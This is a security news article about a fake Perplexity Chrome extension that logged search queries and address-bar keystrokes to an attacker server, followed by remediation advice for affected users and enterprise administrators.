Fake Perplexity Extension Siphoned Every Chrome Address Bar Keystroke
Microsoft researchers flagged a counterfeit Perplexity Chrome extension that piped queries and omnibox input to an attacker server before completing the search.
A Chrome extension impersonating Perplexity's AI search tool was quietly logging every query and every character typed into the address bar, routing the data through an attacker-controlled server before users ever saw a results page.
Microsoft researchers identified the extension and disclosed it to Google, which has since pulled it from the Chrome Web Store.
The abuse pattern is worth pausing on. This wasn't a passive credential stealer. The extension acted as a man-in-the-middle for the omnibox itself, intercepting keystrokes as they were typed, forwarding them out, and only then redirecting the user to the legitimate search destination. From the victim's perspective, the browser behaved normally.
What that means in practice: anything fat-fingered into the URL bar — internal hostnames, partially-typed session URLs, query strings containing tokens, draft questions to a chatbot, the half-typed name of an employer or medical condition — was exfiltrated character by character.
Microsoft has not publicly disclosed the number of installs, the duration the extension was live, or the geography of the command-and-control infrastructure at time of writing. The company attributes the discovery to its own threat research team rather than an external reporter.
This fits a pattern Threat Vectr has tracked through 2024 and 2025: extension stores being used as a low-friction distribution channel for surveillanceware that mimics popular AI brands. Perplexity, ChatGPT, Claude and Gemini have all been impersonated in browser add-ons over the past eighteen months. The brand recognition does the social-engineering work for the attacker.
Jurisdiction here is messy. There is no formal breach-notification trigger for an extension-store takedown, because Google is not a data controller for the exfiltrated content and Microsoft is the discoverer, not the custodian. Affected users will likely never receive a notice. In the EU and UK, if any of the intercepted queries contained personal data tied to an identifiable individual, the operator of the extension would be the controller — and unreachable.
What affected users should do
If you installed a Perplexity-branded Chrome extension from a third-party publisher in recent months, assume your browsing telemetry was exposed. Remove the extension, then audit chrome://extensions for anything you don't recognise. Rotate credentials for any service where you may have typed a session-bearing URL or token into the address bar. Check chrome://settings/syncSetup to confirm synced data hasn't propagated the extension to other devices on the same Google account.
For enterprise admins: pull extension inventory from your endpoint management console and block install-by-ID for the offending package once Microsoft publishes the manifest hash. Force-install policies via Chrome Enterprise are the cleanest mitigation against future lookalikes.
Verify the real Perplexity extension by publisher identity, not by name or icon. Both are trivially cloneable.
